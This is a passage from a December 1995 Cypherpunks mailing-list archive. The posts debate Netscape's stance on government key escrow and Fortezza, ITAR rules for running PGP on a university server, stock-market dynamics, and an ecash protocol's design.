golden-boy status to sucker punch the gov't. >Why not say: > > 1 Netscape will follow all laws and regulations. > 2 The current rules are forcing Netscape to choose > between providing reasonable levels of privacy > to its customers and competing in the international > marketplace. > 3 Netscape feels the rules should be changed to make > this choice unnecessary. Bah. Why not: 1 Make illegal software available by FTP 2 Explain it's doing so because ITAR is bullshit 3 Face the gov't down in the press and in the courts >If you make that argument publicly, you'll get widespread support from the >business communitity and the general public. And if it turns out that we >can't win, you can always fall back on selling totalitarian-friendly >products. If NS did this, they'd win BIG. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMHndb3g0mNE55u1AQG3cAH/dQnrTUyZRIdz1P3lTGhQzOqvG2NSWdeh YVYPN+wTZBfnBWlMwIkODAuyafbyFEGr5+lsgTBOtYDCVWFsW8LdWQ== =+Wxw -----END PGP SIGNATURE----- From djw at pdcorp.com Sat Dec 2 18:28:14 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Sun, 3 Dec 1995 10:28:14 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: Message-ID: <30c10224.23418425@email.pdcorp.com> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn wrote: >On Sat, 2 Dec 1995, Jeff Weinstein wrote: > >> Black Unicorn wrote: > >> > AT&T seems to have been suitably 'incentivized' >> > The receipt of government funding (in whatever guise) might be just as >> > powerful in this case. >> > >> > To the outsider, it looks as if Netscape 'owes' the government. >> >> We do owe the government. They have paid us for Servers and Clients >> that support Fortezza. That is what we owe them. The money that the >> NSA gave us for Fortezza is not very significant compared to what we >> are getting from commercial sources. > >Obviously it was significant enough to take. It was also a perfect >opportunity for Netscape to express concerns about the future of the >technology, which is in netscape's interest. The astute deal maker would >be happy to work with the NSA on his own terms. Instead, it >would appear that Netscape is working FOR NSA on their terms. If you read what they had to say about this, you know that they are hoping others will create non-escrowed crypto hardware using the same interface. I see no reason for them to not include support for any available hardware system (even if it includes GAK), as long as they continue to support non-escrowed encryption internally. This allows the customer to decide that they have no problem with GAK and use the external system, or use the internal system and not have GAK. >> > > We are actively lobbying in washington to get clarification of the >> > > current regulations so that we can provide the US version via an "export >> > > controlled" FTP or HTTP download. >> > >> > With which firm? Or have you made it an in-house effort? >> >> We have recently hired a government liason person to manage our policy >> discussions with the government. He is one of the people that will be >> talking to congressional and white house representatives next week. >> I don't know if we have made use of any outside lobbying firms. > >I'd be interested to know what a 'government liason person' is. It >sounds to me like an 'in house lobbist.' There is an old joke in the >beltway about in house lobbists. > >I also would like to know why you are actively lobbying for >'claification' rather than 'modification' of the current policy. Until the current policy is clearly defined it is like a moving target. Once the government has been pinned down to a single policy, it will be much easier to dispute their policies. Currently the government can say anything they want about their enforcement of ITAR, because they have not stated a clear set of rules with regard to it. Once they have set clear rules, those rules can be shown to be overly restrictive or even unenforceable. Also, lawyers usually advise clients based on a worst case scenario, thus when the government is unclear on its rules, the lawyers advise their clients based upon the worst possible interpretation of the law. This is done to protect their client. By not stating a policy, the government is making that worst case happen, without having to be the bad guy by actually attempting to enforce such a policy. > >Netscape seems to be taking the position, "We'd love it if you'd let us >do X, but we are happy to roll over for whatever." and "By the way, >what is the rule on exporting software again?" > >I am impressed that some effort is being made. I think it in the form of >'too little, too late.' But hey, who am I? I think you are being too critical, they have done more than any company I know of to make easy to use crypto widely available. They may be willing to obey the laws if they require GAK, but I do not feel that they are just rolling over either. I strongly oppose GAK, but I do not believe that no crypto is better than GAK crypto. I would rather keep some people out than nobody out. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From mab at crypto.com Sat Dec 2 18:40:05 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 3 Dec 1995 10:40:05 +0800 Subject: Remind me why we're so mad at Netscape Message-ID: <199512030233.VAA09146@crypto.com> Could someone please remind me what it is we're mad at Netscape about? As far as I can tell it's some combination of the following offenses: (a) - Jim Clark made a speech in which he revealed that he thought the government would be a player in determining the way cryptography ends up being deployed on the Internet. He was quoted in the trade press, but it was unclear exactly which words were actually his. Asked to clarify, he said that Netscape would implement mandatory government access across its product line only if required to by law, but he observed that things seem to be moving in that direction. I share his pessimism, unfortunately, unless we find a way to shift the winds. (b) Netscape contracted with the government to produce a ``Fortezza'' version of their browser for government use. They negotiated to get a lot of money for this (maybe something like $5 million). Good for them. Personally, I *like* the Fortezza interface; the API seems to provide a good abstraction for hardware and software crypto, it's easy to replace the module with something else (like software 3DES with no key escrow), and it's easy to defeat the key escrow features. Of course, maybe I'm just defending them out of guilty self-interest here, since I've played around with the Fortezza interface quite a bit myself, although they never sent me my $5 million. (c) No one from Netscape attended Bernstein hearing. I wish someone had let me know beforehand that that was to be the litmus test for the right to claim cryptographic correctness, or I would have flown right out. I guess I blew it, too. (d) Their stock price is very high, many times greater than their profits and physical assets would seem to justify. I'm not sure I understand the implication here. Maybe that this is proof that in exchange for selling out (by committing sins (a), (b) and (c), above), the secret NSA stock-price-manipulation cabal rigged the market to overvalue their stock? Wow. Don't get me wrong here; it may be useful to make clear that the market (to the extent that any of us can claim to represent any market they would be interested in) won't tolerate vendors who put the government's desires ahead of their customer's security needs. But I have yet to see any actual evidence that that's what's happened here, and I'd hate to see Netscape loose a lot of good people who could go a long way toward deploying real security on the net over something that turns out to have been a false alarm. Disclaimer: I'm employed full time by a soon-to-be-tri-vested major player in the military industrial complex, and us sellouts like to stick together. -matt From btmoore at iquest.net Sat Dec 2 18:40:38 1995 From: btmoore at iquest.net (Benjamin T. Moore) Date: Sun, 3 Dec 1995 10:40:38 +0800 Subject: "Got a subpoena?" Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 12:09 PM 12/1/95 -0600, Al Thompson wrote: >At 06:57 PM 11/30/95 -0500, JHupp at Gensys.Com wrote: > >> And at that point, you shut down the remailer and log each and every >>bounce. >> >> Now, they could get an order forcing you to run a remailer ~ but that >>would open up a whole new can of worms i.e. can you be forced, under >>court order, to commit a crime? > >That's not how they do it. They will tell you that unless you cooperate, >you will >be charged for the "crime" you have been committing. Where do you think >confidential informants come from? They're just people who have been caught >or set up by the cops, who are trying to save their own ass. > There are times when all that can be said is Amen!!! Most of these people have absolutely no clue to the way the government REALLY works! The feds will set up a "little" fish in order to catch what they consider to be a "big" one. Ask Randy Weaver! They weren't really after him... they were after the Aryan Nations. They wanted Mr. Weaver to infiltrate for them... So they attempted to encourage his enthusiasm... How? They set him up on a bogus gun charge... when that wasn't successful... They killed his family! The problem is people still live under the mistaken notion that there are rules! When the congress and the courts passed laws allowing the confiscation of property without due process and further allowed the proceeds from the sell of that property to fund the coffers of the agencies that took those properties, they assured our descent into a totalitarian state. We are like the walking wounded, soon to be the walking dead. We are dead and don't know it! Unless the tree of Liberty is watered soon... it seems we are doomed! Benjamin T. Moore, Jr. btmoore at iquest.net (Jian #AJF IRChat) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMD7YISAJOVFNaChAQGolwf+IBbGrWn5HvRwHpIuAu+GbVgOgIP3ZIyo CVt8EgvoAiq11Qo6B/aRawGhwxgmLCEZWbFaW/QrHQTsOWspqPmKd8N0h5ZIhn73 c84NOxjXEOcOUHwtmGgDL5kK1hvaqClmTXG3DjmCVoYgXIbHm73JB1liKwGsHn2E TXAT4jEDUp2wBWiDNc2/z2dPzPgm/l+0xwzLZYPNMkL2/vgCrfSVewwBKXmk1oDZ lYysKonja02NgYWUy2Ujz9gr69kfriZgdz4SIO+mbakhbPBqJZUEQg8fwZnz8fgU hRmFoVFudRPRn1qyU65tzLbGurpXT8hxYbWwv895qaDfLHdQ2IH0iQ== =On3V -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Sat Dec 2 18:52:06 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 3 Dec 1995 10:52:06 +0800 Subject: Talking to Jim Message-ID: <199512030205.SAA12208@jobe.shell.portal.com> On Sat, 2 Dec 1995 anonymous-remailer at shell.portal.com wrote: > > The market seems to "think" that it's a better present judge > > of what Netscape has than he does. It's almost as though > > the "market" has developed a "mind" of its own. > > Well, of course! Markets are the most efficient integration of the minds > of the participants, hands down. Hands down efficient integration?? Not especially. First you have to really wonder what and who the "participants" in this market are. As an example, year-ends have certain particular momentums. So do capital gains considerations. All part of the mind of Buddha, as some of the fruitcake players might say ... and all part of the known interplaying "participants". > > It's own particular neural network. > > Exactly. Literally. And huge, too. Except that this one doesn't listen to any of its sensors or input devices. It's learned to ignore all of *that* information, because all of *that* information is inherently untrustworthy, so it simply listens to it's very own dialogue. Sort of like feeding off of a feedback loop. > > It's almost as though there is automated software at work. Just like October, 1987. It simply listened to itself and kept telling itself that it was "actually" making money all the way down. Portfolio Insurance be damned, it was doing "OK". > There is: Wetware. Massive concurrent processing, heavy parallelism, > inefficient I/O. Distributed, redundant memory. Inefficient but infinitely > adaptable interprocessor routing. Capable of handling any degree of > outage. All elements individually expendable. Self-replicating processors > that have significant lead time but integrate smoothly into the net. > Designs and builds its own outboard peripherals and interconnects. Best > damned planetary computing system in this star system. But I diverge... IMHO, there is very little wetware left in the market. This is now the 90's. Time to get with the programs. > It's not always right (though self-fulfilling prophecy is often a big > part of the equation), and it often misses the anolamies, but because it > IS an integration is precisely why it may mean something different than > you suggest. Oooo ... duelling programs ... especially one which is designed to ignore the other one and not listen to any of its "blather" ... this oughta be interesting to watch ... Luckily, I'm outside this theatre of operations. > Netscape's share price more directly reflects the personal involvement and > upward view of real people with respect to the Internet/WWW than anything > else we have. "Personal" involvement and "real" people have very little to do with a market that is driven by institutions and other vectors. Institutions which have to "show" what their exposure to the "technology and Internet" sector is when they file their portfolio reports will want to show something on their book. And they'll look for a safety in numbers thing, and will flock to the "darlings". "Real people's views" also won't count for much if Netscape defines an entire new economic sector -- the ground floor of the Internet. "Real people" don't factor in if it becomes part of the S&P 500 and every index fund "has" to -- by definition -- buy it. "Real people" also have very little impact on the blow crazed trader who's on a run and actually actively managing and turning-over the pension funds or mutual funds of some group. (Or even a sector fund, whose by-laws won't allow it to sit on cash, as it flows in the door.) These guys have far more influence than the aggregate of individuals who might buy or sell "small" lots at the market. "Real people" don't impact nor control the communications networks of block trading reports. And they don't impact systems which *must* put their money out, and put it to work. Real people are really just noise in the flow. The idea that individual supply/demand is what moves prices is a fallacy. It's not the "reality" behind the shell game. Buying or selling pressure doesn't ever function as a price mover, because for every "buyer" there is a corresponding "seller". Zero-sums type of stuff. It no more reflects the inherent strength of the Internet, than the Dutch Tulip craze reflected the inherent strength of Tulips. > Remember, there are still naysayers out there, declaiming in places > from books to columns to TV, while the reality is that computers are > now outselling televisions, and a key new form of synergistic human > communication is exploding in exponential growth. Humans deal on a > personal level only moderately well with linear processes, and > poorly with geometric processes -- it's understandable that the > growth of the Internet/WWW and the implications of thereof would be > late in being recognized and be incorrectly understood until > sometime AFTER the changes have rocked the society. Nonsense. (No offence, btw ...) We're back to the man who simply closes his eyes to what's happening, or the ostrich sticking its head in the sand. We've already got the experience to understand how these things work. They've got the "play book", and are following it step by step. > Capitalize ME to the tune of $5 billion, for instance, and I may > be influential not only during the course of your life but the lives of > your great-grandchildren. Capitalize how? Balance sheet? Or market? A $1 Billion or $2 Billion rights issue might be one thing, but this one is another. > Selling Netscape short may or may not be a wise move -- selling market > processes short is usually a fool's exercise in self-delusion. It really depends on what and how you use that tool, doesn't it?? As an example, short sales are excellent ways of "creating" stock in thin markets. They can work to create a virtual share. This might sound strange, but it's a feature of the "market". "Shorts" usually sell borrowed stock hoping to buy it back cheaper at some later date. A broker goes out and "borrows" the stock from another broker, and then that stock is sold to a buyer. The two legs of the short sale actually work together to create a "virtual" share of the corporation. This creates "volume" by trading a "virtual share". At some point, these used to be called derivative plays, before that word became dirty in and of itself. To explain. Let's say that XCO owns 100 shares of Spyglass. And YCO "shorts" 100 Spyglass. What actually happens is that YCO has simply signed a note saying that they "owe" XCO's broker 100 shares of Spyglass. If YCO now sells that stock to ZCO, then there are actually now 200 shares of spyglass out there. 100 actual ones owned by XCO, and 100 virtual ones owned by ZCO. (And a note to someone that says ... I owe ya, a 100 Spyglass.) But the "virtual" stock is indistinguishable from the "actual" stock. Of course the generally known risk is that with price movements that YCO could loose a lot of money on its short. Especially in a "squeeze" play. But if YCO and ZCO are actually "friendly" then all they have to do is shift a lot of money around as the price gyrates. Back-to-back credit facilities usually suffice for this purpose, since all that they really need is a "note" from their banker saying that they're "good people" and are "good for the money", if something does go wrong. That their credit is good in the casino. (And mathematically in fact ... they are good for the money ... cause they don't have a market "position" or opinion, even though they can trade one heck of a lot.) In this case, the short can't be "squeezed" cause he's actually covered. But it can lead to some really interesting optics. And these programs do listen to optics. Especially if YCO and his ZCO friend are up against ACO and his BCO friend. I think it's all just a virtual war at that point. Something to watch via Quotron. But then you'd need a Quotron for that, wouldn't you?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. > > We Jurgar Din > (that will have to suffice: I do not yet live in a free country) > > +"The battle, Sir, is not to the strong alone. It is to the+ > +vigilant, the active, the brave. Besides, Sir, we have no + > +election. If we were base enough to desire it, it is now + > +too late to retire from the contest." -Patrick Henry 1775 + > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ > fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ== > =/2cN > -----END PGP SIGNATURE----- > > > > > > > > From tcmay at got.net Sun Dec 3 10:58:01 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 95 10:58:01 PST Subject: Do the Right Thing Message-ID: My thesis is that both Netscape and Microsoft are in positions at this time to either do the right thing (tm) or to help build in the tools for a police state, an Orwellian surveillance state. Netscape, being the dominant browser company, and Microsoft, being the dominant OS company, are in special positions to "build in Big Brother." I'm not claiming they are, just that they are clearly in a position to make it technologically more feasible to make non-GAK illegal. They both need to carefully think about the role that's been "given" to them (whether by fortune, hard work, or being in the right place at the right time) and do what's right. Strong words, perhaps, but the implications of mandatory key escrow are quite clear. We debated these points for a long time during the Clipper debate, and later when "Software Key Escrow" began to rear its head. I won't repeat these arguments against GAK here, but will take this opportunity to quote from a new book that actually quotes my words: "May, ever the idea juggler, also weighed in with some powerful arguments _for_ PGP that appealed to a stodgy old Democrat (small "d" as well) like me. Even the Feds should have grasped them. "Could strong crypto be used for sick and disgusting and dangerous purposes?" May asked. And then he answered himself: "So can locked doors, but we don't insist on an 'open door policy' (outside of certain quaint sorority and rooming houses!). So do many forms of privacy allow plotters, molesters, racists, etc. to meet and plot." Whatever May was, anarchist, libertarian, objectivist, or nothing, he was making more sense in those three sentences than Baker could have in a 1,000 essays." [David H. Rothman, "NetWorld! What People are Really Doing on the Internet, and What it Means to You," Prima Publishing, 1996. Note: I don't recall meeting Rothman, and didn't know about this book until I stumbled across it last night in a bookstore.] It is important that such companies as Netscape and Microsoft fully understand that crypto policy will largely determine civil liberties in this country and other countries for a long time to come. And they must understand that they can influence the direction. Bill Gates, after some early waffling, seems to now fully understand the implications of GAK and has written persuasively against it. Jim Clark does not seem to me have thought about it as deeply, or perhaps has views of civil liberties which are not at odds with mandatory key escrow, the "open door policy" mentioned above. And time is of the essence. Things move very fast. It is no longer the case that a law is passed, then companies respond to the new legal regime with their own policies and products. Companies, especially in high tech, are "partners" from the start, as we saw with the Clipper development (where AT&T had known about Clipper for years prior to the first public announcement, and was cooperating in the development of it, not to mention the other companies such as Mykotronx, VLSI Technology, etc., which were involved in secret for years). It is only sheer speculation on our part (some of us, at least) that negotiations about GAK have been going on with the major software companies. Jim Clark, for example, learned what he knows about key escrow _someplace_, and it probably wasn't from our list or from articles he'd read. I'm betting, but could of course be wrong, that he and other folks at Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have been briefed on key escrow and that various negotiations are already underway. This would match how things were done with Clipper, and would explain Clark's voiced support for the need for GAK. I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too high for product decisions to be made without full awareness of the implications. The statements from Jim Clark do tend to imply a kind of defeatism, and even Jeff's comments seemed laden with qualifications about "only if the government requires us to." As Hal Finney noted in his post, it's as if the Netscape people are preparing for the inevitable. Maybe it's not an indication that GAK is being considered within Netscape, but maybe it is. After all, one rarely hears "only if we have to" qualifications on things that are truly from out in left field. And what Netscape agrees to put in future releases of its browsers or its servers could have dramatic effects on the whole climate. (A side point, somewhat abstract: The dominance of Netscape, rising from nowhere to becoming the major player in this debate, illustrates a point about "monocultures" and their ecological effects. If yellow corn is good, replace other strains of corn with yellow corn. Pretty soon, the world's corn output is 96% yellow corn. Some ecological downsides to this. In this case, Netscape is becoming the yellow corn of the Web, and an obvious "choke point" for the NSA and its sisters to mandate crypto policies. Hence, the role of non-yellow-corn alternatives...) Should Netscape play ball with the NSA or refuse to cooperate? I'm not suggesting that Netscape "break the law." Actually, there are *no* laws at present about GAK or about the use of strong crypto within the U.S., and most of us want to keep it that way. Thus, Jim Clark and Netscape could strongly lobby for keeping things the way they are, and could even say "If foreign governments demand GAK, let them build it in themselves--we will not produce the software to run a police state." And if export laws demand GAK in exported products, Netscape should "do the right thing" and have two versions. It may add to their costs a little, but it's better than building in the machinery for a GAK law to later be passed. (Explain something to me. I have never, ever understood why it is a concern of the U.S. government that we help build in GAK for foreign governments, that we make sure that products intended for export to France or Syria have GAK that allows those governments to read the traffic of their citizens. And if the concern is that exported versions of software must be readable to the _United States_, then this is a non-starter in terms of sales in many or even most foreign countries! I'm sure France will welcome with open arms a version of Netscape that allows the NSA to read the traffic of French citizens. Oh, by the way, what legal jurisdictions will be involved in obtaining the escrowed keys of foreigners? The answers are both clear and murky, if you catch my drift.) If the U.S. insists on GAK _within the U.S._, as many of us fear is the long-term danger, then all bets are off anyway. But I would hope that Netscape does nothing to make it _easier_ to make this the case! A viable thing for Netscape to do is to announce forthrightly that it will separate the issue of export from what it sells in the U.S., that there will be NO GAK included in any U.S.-sold packages. The quest for an "all world" version, freely exportable, should not take precedence over the civil liberties issues. And I predict that any slight losses in market share or slight increases in product cost will be _less_ than the effects Netscape will see if their product comes to be associated with "Big Brother Inside." Enough for now. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From Alan.Pugh at internetMCI.COM Sun Dec 3 11:02:22 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Sun, 3 Dec 95 11:02:22 PST Subject: toy story: more power Message-ID: <01HYDG3GEDJM94E9C0@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- obcrypto: i'd like to see how bruter.c would have run on their 'renderfarm'. MOUNTAIN VIEW, CALIF. (Nov. 30) BUSINESS WIRE -Nov. 30, 1995--The making of "Toy Story," the stunning new movie from Walt Disney Pictures that is the world's first full-length completely computer-generated animated film, involved the use of more than 100 high-powered computers from Sun Microsystems -- which together comprised one of the most powerful graphics rendering engines ever created. =snip= For the movie, Pixar created a networked bank or "cluster" of 117 Sun(TM) SPARCstation(TM) 20 workstations -- each containing at least two microprocessors, and running on Sun's Solaris(TM) operating environment -- to handle the critical task of "rendering" each of the 114,000 frames in the 77-minute movie. =snip= Sun worked closely with a team from Pixar to create its RenderFarm, which serves as Pixar's central resource of computer processing power. The RenderFarm uses a network computing architecture in which a powerful SPARCserver(TM) 1000 acting as a "texture server" supplies the necessary data to the many rendering client workstations needed to complete the rendering process. The RenderFarm was assembled by Sun and Pixar engineers in less than a month and drew upon Sun's own experience in setting up "farms" of many systems linked together. Some facts about Pixar's RenderFarm and the computing aspects of "Toy Story": -0- -- The RenderFarm is one of the most powerful rendering engines ever assembled, comprising 87 dual-processor and 30 four-processor SPARCstation 20s and an 8-processor SPARCserver 1000. The RenderFarm has the aggregate performance of 16 billion instructions per second -- its total of 300 processors represents the equivalent of approximately 300 Cray 1 supercomputers. -- Each system is the size of a pizza box, and all 117 systems work in a footprint measuring just 19 inches deep by 14 feet long by 8 feet high. -- Sun is the price/performance leader, in Pixar's own rankings. The SPARCstation 20 HS14MP earned a rating of $80 per Rendermark (a Pixar measurement for rendering performance), while the comparable SGI Indigo Extreme came in at approximately $150 per Rendermark. -- Using one single-processor computer to render "Toy Story" would have taken 43 years of nonstop performance. -- Each of the movie's more than 1,500 shots and 114,000 frames were rendered on the RenderFarm, a task that took 800,000 computer hours to produce the final cut. Each frame used up 300 megabytes of data -- the capacity of a good-sized PC hard disk -- and required from two to 13 hours for final processing. -- In addition to the high-resolution final rendering, the RenderFarm was also used to generate the test images animators needed to plan and evaluate lighting, texture mapping and animation. Since fast response is key in doing tests, RenderMan could produce test frames in as little as a few seconds. -- Scalability is built-in: the RenderFarm can be upgraded (with more processors and disk storage) to a nearly four-fold performance level, without requiring any additional space. The RenderFarm also integrates seamlessly with Pixar's existing computer network containing different types of machines. =snip= From wiltship at iccu6.ipswich.gil.com.au Sat Dec 2 19:16:11 1995 From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire) Date: Sun, 3 Dec 1995 11:16:11 +0800 Subject: Talking to Jim Message-ID: <199512012310.KAA23844@iccu6.ipswich.gil.com.au> Gidday all I emailed Jim Clark day before yesterday about his comments re key escrow. He responded. As it's not good form to post private email, might I suggest that one of the 'elders' here put to Jim a list of questions on the proviso that his answers can be posted to the list. You never know, a lot of speculation might be confirmed or denied. cheers Peter Flight to Quality Wiltshire Productions Pty Ltd Brisbane, Queensland, Australia Intl Voice 61 7 3376 3535 Intl Fax 61 7 3279 4027 Email wiltship at gil.com.au PGP Key ID 3E584C7D PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10 From 103155.2774 at compuserve.com Sat Dec 2 19:16:40 1995 From: 103155.2774 at compuserve.com (103155.2774 at compuserve.com) Date: Sun, 3 Dec 1995 11:16:40 +0800 Subject: No Subject Message-ID: <199512012300.SAA25794@arl-mail-svc-1.compuserve.com> Hello...i'm new to this, but love it...Tell me how exciting this is!!!!!/// From cabeen at netcom.com Sat Dec 2 19:28:14 1995 From: cabeen at netcom.com (Ted Cabeen) Date: Sun, 3 Dec 1995 11:28:14 +0800 Subject: Use of PGP as an export? Message-ID: <2.2b7.32.19951203050924.002d163c@netcom17.netcom.com> I think this has been brought up before, but I could only find one reference to it in the archives and it wasn't too helpful, so I'll ask again. If a university provided a copy of PGP for use on their unix machines and a non-resident, non-citizen *used* the copy of PGP on the server, but did not download it onto their own machine, but instead just ran PGP on the server alone, would it be a violation of the ITAR? My school is interested in putting a copy of PGP on the university server and wants to know if they should somehow restrict access to citizens and legal residents only. Thanks. _____________________________________________________________________________ Ted Cabeen cabeen at netcom.com Finger for PGP Public Key secabeen at midway.uchicago.edu "I have taken all knowledge to be my province." cococabeen at aol.com From ddt at lsd.com Sat Dec 2 19:34:40 1995 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 3 Dec 1995 11:34:40 +0800 Subject: EXO_ner Message-ID: At 9:34 AM 12/2/95, John Young wrote: >SenXon and The Washrag blow today about which has the most to >be ashamed of and hide from the filthy lingerie leering >republic. Exon, Exoff, XON, X-off, Exxon, ex-off. dave ____________________________________________________________________ "Packwood's supporters were left groping for answers." --news anchor From stewarts at ix.netcom.com Sat Dec 2 19:37:04 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 3 Dec 1995 11:37:04 +0800 Subject: Remind me why we're so mad at Netscape Message-ID: <199512030316.TAA05756@ix5.ix.netcom.com> At 09:33 PM 12/2/95 -0500, Matt Blaze wrote: >Could someone please remind me what it is we're mad at Netscape about? >As far as I can tell it's some combination of the following offenses: > >(a) - Jim Clark made a speech in which he revealed that he thought the >government would be a player in determining the way cryptography ends >up being deployed on the Internet. He was quoted in the trade press, >but it was unclear exactly which words were actually his. Asked to >clarify, he said that Netscape would implement mandatory government >access across its product line only if required to by law, but he >observed that things seem to be moving in that direction. I share his >pessimism, unfortunately, unless we find a way to shift the winds. I give Netscape a lot of credit for the way they've handled things so far; their US commercial version supports strong crypto (modulo a few bugs :-), and interoperates with their free exportable version, which is itself far stronger than a minimal 40-bit version could have been. And they're adding secure email to the new version. And (while they can't officially say this, of course) anybody overseas can pirate the strong-crypto version if 40 bits aren't enough. PGP gave anybody who wanted to do a bit of work the ability to do trusted communications, but it's still not widely used because it does take extra work; the most important things it's done have been to raise public awareness and make it obvious to everybody that the cat's out of the bag, which also pressured the government into dealing with the issue. Netscape is putting built-in strong crypto in the hands of tens of millions of people; fait accompli like that make it much harder for governments to impose stupid and offensive rules. Maybe Netscape will come out with GAKed versions for export to nosy-governmented countries like France and the US; as long as the main version has secure communications, and they're open about how their crypto really works, we can talk securely domestically, and other folks can pirate them to use instead of GAKware. If the government wants to pay extra to support special hardware crypto modules for their own use, and the modules do GAK, that's an internal problem (as long as we can subpoena their records.) Of course, in case the main US versions ever have GAK as a default, I do reserve the right to flame Netscape again :-) >(d) Their stock price is very high, many times greater than their >profits and physical assets would seem to justify. I'm not sure I >understand the implication here. I think it's that "Netscape is now in a financial position that pushes them to care more about making some profits to justify their appallingly high stock price so they're more likely to lose big bucks if they don't sell out, and I should have bought it at $70..." >Disclaimer: I'm employed full time by a soon-to-be-tri-vested major >player in the military industrial complex, and us sellouts like to >stick together. Definitely. Back when I was a tool of the military-industrial complex, I was two floors down from Matt, in an RF-shielded room :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From stewarts at ix.netcom.com Sat Dec 2 19:46:50 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 3 Dec 1995 11:46:50 +0800 Subject: Use of PGP as an export? Message-ID: <199512030324.TAA07279@ix5.ix.netcom.com> At 09:09 PM 12/2/95 -0800, Ted Cabeen wrote: >I think this has been brought up before, but I could only find one reference >to it in the archives and it wasn't too helpful, so I'll ask again. If a >university provided a copy of PGP for use on their unix machines and a >non-resident, non-citizen *used* the copy of PGP on the server, but did not >download it onto their own machine, but instead just ran PGP on the server >alone, would it be a violation of the ITAR? My school is interested in >putting a copy of PGP on the university server and wants to know if they >should somehow restrict access to citizens and legal residents only. Thanks. That's not giving technical data to the foreigner, that's providing a service; the ITAR doesn't seem to restrict that. It's not an especially secure way to operate, but that's an inherent problem with multi-user systems or file servers. One way to implement it that would be only mildly insecure would be to put PGP on a file server, with execute-only permissions; users of client machines still could be attacked by somebody faking out NFS, but they wouldn't have to send their passphrases across the net the way they would in a telnet session. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From hfinney at shell.portal.com Sat Dec 2 19:53:38 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 3 Dec 1995 11:53:38 +0800 Subject: Questions/Comments on ecash protocol Message-ID: <199512030334.TAA18144@jobe.shell.portal.com> From: Ian Goldberg > I read these specs for a little while last night. Here are some of my > questions/comments. To prevent this message from becoming huge, I won't > quote much from the protocol document itself; the URL is above if you want it. > I'll ignore the spelling/grammar; they can be fixed later. I was also reading it, and I share some of Ian's questions, but for some things I have a few different guesses. > What is the function f, used in the payment_hdr to hash the payer_code > and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h? > There is reason to believe it is SHA, but I thought I saw some stuff in the > client that indicated that the output of f is 132 _bytes_ long (but I'm > not exceptionally sure of this, not having source and all). One rather cryptic sentence, which Ian alludes to later, relates to cancelling payments: "The 'payer_hash' is the one-way image of a by the payer generated random number...". In the diagram it shows it as f(payer_code), where payer_code is shown as "random code generated by player". (And, as Ian points out later, the document inconsistently says that "the player generated random number" should be kept secret while requiring that it be sent to the shop - at least, this is inconsistent if it refers to payer_code.) Assuming the use of the word "a" is not a typo but refers to some number, this suggests that f() is at least potentially a two-input function, some value a and a player generated random number. > Please clarify what parts of the payment_hdr are shipped around. The document > says that the shop checks if the descr_hash matches the description. > Since the description is in the second part of the payment_hdr, does that > mean that both parts are sent to the shop? Noticing that the payer_code > (which the payer is supposed to keep secret) is in the second part, this > doesn't seem to be right. Also, the document states that the payment hash > is not sent from the payer to the shop or from the shop to the mint. However, > the payment hash is just the SHA of the first part of the payment_hdr, > which _is_ sent around, so although the payment hash isn't transmitted > per se, it can certainly be calculated. It seems that the whole payment_hdr is sent to the shop, and only the portion before the line is sent to the bank. This is enough, as you say, to calculate the payment hash, so the bank can decrypt the coins. This prevents the shop from changing any of the information in that first part of the payment header before sending it to the bank. My question in this part relates to coins made out to "@" which we have been told can be deposited by anyone. How does the bank know to which account to deposit such a coin, given a deposit message? The shop's ID does not seem to be present in such a message, assuming that the shop_accID field of the payment_hdr just has "@" in that case. Is it the userid field in the userhdr message which tells the bank this info? BTW since apparently both deposit and payment messages are not encrypted, coins made out to "@" are in danger of being stolen both while en route from customer to shop and from shop to bank. This is significant from the point of view of payee anonymous systems, which will need to use such coins. More encryption will be necessary when such coins are passed around. > A (very slight) privacy concern: the payer's bank is sent in the clear, > which gives a very small amount of information about the identity of the > payer. More on who knows what later. Well, I would think identification of the payer's bank will be necessary for any 